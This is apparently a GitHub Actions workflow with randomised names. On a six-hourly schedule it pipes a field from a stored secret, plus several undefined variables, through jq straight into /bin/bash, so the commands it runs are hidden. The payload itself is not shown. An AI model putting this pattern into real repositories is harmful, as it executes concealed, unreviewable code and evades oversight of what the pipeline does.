name: yanfeihong5672
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanfeihong5672
        env:
          lqlz16: ${{ secrets.lqlz16 }}
        run: |
          echo $lqlz16 | jq -r .iduin6 | /bin/bash
          echo $aou233 | jq -r .lrbw448 | /bin/bash
          echo $z8072 | jq -r .hwlpm68199 | /bin/bash
          echo $bt5 | jq -r .qbyt540 | /bin/bash

